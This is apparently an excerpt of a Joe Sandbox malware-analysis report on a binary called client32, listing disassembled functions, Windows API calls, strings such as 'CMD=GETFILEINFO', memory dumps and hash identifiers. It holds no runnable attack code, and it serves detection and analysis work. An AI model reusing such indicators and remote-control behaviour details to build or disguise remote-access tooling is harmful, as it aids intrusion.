                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 328603210-0
                                                                                                                                        • Opcode ID: 5bcd742a4fc87988e3fddd6e8cfa80cd78d0e0d900bb11ff8b1626e687896c97
                                                                                                                                        • Instruction ID: 13ead169d65073c98a5063470e4da0243f6fc40e165f460e5c097f55247d8bd0
                                                                                                                                        • Opcode Fuzzy Hash: 5bcd742a4fc87988e3fddd6e8cfa80cd78d0e0d900bb11ff8b1626e687896c97
                                                                                                                                        • Instruction Fuzzy Hash: D001B13530D21A9FFB258E25CC14B6B37D8AB82B68F404529E8B7EB180DB75DC04C641
                                                                                                                                        Function 1116C936 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979
                                                                                                                                          • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 328603210-0
                                                                                                                                        • Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                        • Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
                                                                                                                                        • Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                        • Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780
                                                                                                                                        Function 11163AB3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __waccess_s
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4272103461-0
                                                                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                        • Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
                                                                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                        • Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540
                                                                                                                                        Function 1105E2EB Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 0063fd1bad2616aadce956affa811ddadc66d32b1d751c4eeb6fdd8492f4b122
                                                                                                                                        • Instruction ID: 149c94328b20b7684e4bcbd68a9865b5e5b17d9681ef1ea46cbc38f3ae43540f
                                                                                                                                        • Opcode Fuzzy Hash: 0063fd1bad2616aadce956affa811ddadc66d32b1d751c4eeb6fdd8492f4b122
                                                                                                                                        • Instruction Fuzzy Hash: 39B09BFFF42115295180655D7C44857EB4CE5D11BD3048537E11CC3501F111543483F0
                                                                                                                                        Function 1116076B Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3646066109-0
                                                                                                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                        • Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
                                                                                                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                        • Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685
                                                                                                                                        Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4582948100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4582924850.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4582971225.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4582994339.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Client32@8
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 433899448-0
                                                                                                                                        • Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                        • Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
                                                                                                                                        • Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                        • Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 688F50E0 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 120fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5131
                                                                                                                                        • wsprintfA.USER32 ref: 688F514A
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 688F5168
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 688F5172
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5191
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 688F51B2
                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,688F9B16,00000001), ref: 688F51D8
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 688F51E4
                                                                                                                                        • wsprintfA.USER32 ref: 688F5225
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 688F5243
                                                                                                                                        • __itow.LIBCMT ref: 688F5265
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 688F5278
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
                                                                                                                                        • String ID: %spacket%03d.trc$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
                                                                                                                                        • API String ID: 2516244645-849037079
                                                                                                                                        • Opcode ID: a043b79e79d67d9c6b0163705b1019e1413dda2ca4bc4a2e06249cc330a3e2d9
                                                                                                                                        • Instruction ID: e352db2684677d0a56479dbdbd5562238a9aa5f78862d4cb33033f7b1609c702
                                                                                                                                        • Opcode Fuzzy Hash: a043b79e79d67d9c6b0163705b1019e1413dda2ca4bc4a2e06249cc330a3e2d9
                                                                                                                                        • Instruction Fuzzy Hash: 44418D70A84328BFEB74DA64DC46F9E37E9A78A704F804554F605FB680DB75F9008B64
                                                                                                                                        Function 688F5117 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 106fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5131
                                                                                                                                        • wsprintfA.USER32 ref: 688F514A
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 688F5168
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 688F5172
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5191
                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 688F51B2
                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,688F9B16,00000001), ref: 688F51D8
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 688F51E4
                                                                                                                                        • wsprintfA.USER32 ref: 688F5225
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 688F5243
                                                                                                                                        • __itow.LIBCMT ref: 688F5265
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(htctl.packet_tracing,nextfileindex,00000000), ref: 688F5278
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PrivateProfile$Createwsprintf$BuffersCloseFlushHandlePointerSizeStringWrite__itow
                                                                                                                                        • String ID: %spacket%03d.trc$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$htctl.packet_tracing$maxfilesize$nextfileindex
                                                                                                                                        • API String ID: 2516244645-849037079
                                                                                                                                        • Opcode ID: aaaf09dac8ea1808ab479aacf8a34c28b7bfd1f88a7d97aa9d022cb6bb5e94a2
                                                                                                                                        • Instruction ID: 3d25ca29c068f10323de1ee8016fe955f9b234f36dfe57e5d43275f1567cd885
                                                                                                                                        • Opcode Fuzzy Hash: aaaf09dac8ea1808ab479aacf8a34c28b7bfd1f88a7d97aa9d022cb6bb5e94a2
                                                                                                                                        • Instruction Fuzzy Hash: 9F31BA70A84328BFEB74DB64DC46F9E37E9A78A704F804554FA05BA6C0DB75E9008B60
                                                                                                                                        Function 68904F30 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 192sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 68904F6D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904FE9
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 68905002
                                                                                                                                        • _free.LIBCMT ref: 68905086
                                                                                                                                        • _free.LIBCMT ref: 689050BA
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689050CB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689050E0
                                                                                                                                        • Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 689050F2
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905108
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905135
                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6890513F
                                                                                                                                        • SetLastError.KERNEL32(?), ref: 68905154
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$ErrorLast$CountEnterLeaveTick_free$Sleep
                                                                                                                                        • String ID: CMD=GETFILEINFO$GSK=%s$Gateway_Gsk$LINK=%s
                                                                                                                                        • API String ID: 619989478-944126313
                                                                                                                                        • Opcode ID: 44f4d34050c6c4bf5eb336c4a403bd7c29bbc64c574688c316df1a1e4fc17ce8
                                                                                                                                        • Instruction ID: 439c0559de4260e62c29eb34fac7d28ca689a461fb7681a623777def397ad98b
                                                                                                                                        • Opcode Fuzzy Hash: 44f4d34050c6c4bf5eb336c4a403bd7c29bbc64c574688c316df1a1e4fc17ce8
                                                                                                                                        • Instruction Fuzzy Hash: 3061B475E08218EFDB20DFA8C948BEE77B8EF49319F904569E515E7240D731EA04CBA1
                                                                                                                                        Function 11127110 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 400COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ManagerOpen
                                                                                                                                        • String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
                                                                                                                                        • API String ID: 1889721586-3267302290
                                                                                                                                        • Opcode ID: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
                                                                                                                                        • Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
                                                                                                                                        • Opcode Fuzzy Hash: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
                                                                                                                                        • Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50
                                                                                                                                        Function 110251B0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(?), ref: 11025347
                                                                                                                                        • DrawMenuBar.USER32(?), ref: 1102535E
                                                                                                                                        • GetMenu.USER32(?), ref: 110253B3
                                                                                                                                        • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
                                                                                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • UpdateWindow.USER32(?), ref: 11025407
                                                                                                                                        • IsIconic.USER32(?), ref: 1102541A
